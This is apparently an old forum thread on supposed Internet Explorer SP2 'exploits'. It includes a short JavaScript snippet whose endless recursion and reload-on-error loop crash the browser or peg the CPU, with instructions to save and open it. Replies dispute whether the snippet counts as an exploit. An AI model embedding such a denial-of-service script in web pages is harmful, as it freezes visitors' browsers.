4 new IE SP2 exploits
...and among them this is quite amusing, causing a multiple stack overflow:
Quote:
<script>
window.onerror=new Function("history.go(0)");
function btf(){btf();}
btf();
</script>
|
Save that as a .html file and open it.
Another:
The third involves adding this address to the "restricted zone":
4.3.2.1btf-errorreporting.btf.de
All these will just crash IE, fortunately.

Re: 4 new IE SP2 exploits
See that first "exploit" try opening the document in firefox, watch your CPU usage shoot right up, personally I'd rather it crashed the browser than leave you a window you can do nothing with.

How are these "exploits" ? They may be obscure ways to crash the browser, but that's about all.

Agreed, as I would like to be able to use my PC without some piece of software hogging 100% of my CPU

They aren't....
IE SP2 asks you if you want to run them.......
.......even if you say yes it asks if you know what you are doing as such files can cause damage.....

It ONLY asks you if you want to run it because you're doing it locally, if you visit a site that's published online then you won't get prompted.
